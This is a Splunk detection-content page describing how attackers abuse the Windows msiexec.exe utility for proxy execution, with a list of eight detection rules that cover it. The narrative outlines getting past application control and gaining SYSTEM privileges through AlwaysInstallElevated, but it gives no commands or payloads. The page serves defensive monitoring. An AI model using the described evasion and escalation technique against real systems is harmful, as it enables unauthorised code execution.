Try in Splunk Security Cloud

Description

Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2022-06-16
  • Author: Michael Haag, Splunk
  • ID: bea2e16b-4599-46ad-a95b-116078726c68

Narrative

Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs. Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated policy is enabled.

Detections

Name Technique Type
Windows MSIExec DLLRegisterServer Msiexec TTP
Windows MSIExec Remote Download Msiexec TTP
Windows MSIExec Spawn Discovery Command Msiexec TTP
Windows MSIExec Unregister DLLRegisterServer Msiexec TTP
Windows MSIExec With Network Connections Msiexec TTP
Windows System Binary Proxy Execution MSIExec DLLRegisterServer Msiexec TTP
Windows System Binary Proxy Execution MSIExec Remote Download Msiexec TTP
Windows System Binary Proxy Execution MSIExec Unregister DLL Msiexec TTP

Reference

source | version: 1